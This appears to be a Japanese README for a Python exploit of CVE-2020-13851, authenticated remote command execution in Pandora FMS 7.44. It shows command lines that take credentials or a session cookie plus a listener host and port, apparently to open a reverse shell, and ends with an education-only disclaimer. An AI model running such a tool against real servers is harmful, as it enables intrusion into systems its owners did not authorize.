
CVE-2020-13851 Pandora FMS 7.44
Pandora FMS 7.44 CVE-2020-13851 RCE は、認証済みユーザーがイベント機能を介してリモートコマンド実行を達成できるようにします。資格情報またはPHPセッションクッキーのいずれかで実行可能です。
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
ヘルプメニューを表示するには
python3 pandorafms_7.44.py -h
このリポジトリで提供されるすべてのコードは、教育/研究目的のみを目的としています。このリポジトリに含まれる資料に関連するいかなる行動および/または活動も、すべてお客様自身の責任となります。このリポジトリ内のコードを悪用すると、関係者が刑事告訴される可能性があります。著者は、このリポジトリ内のコードを悪用して法律を破った個人に対して刑事告訴が行われた場合、その責任を負いません。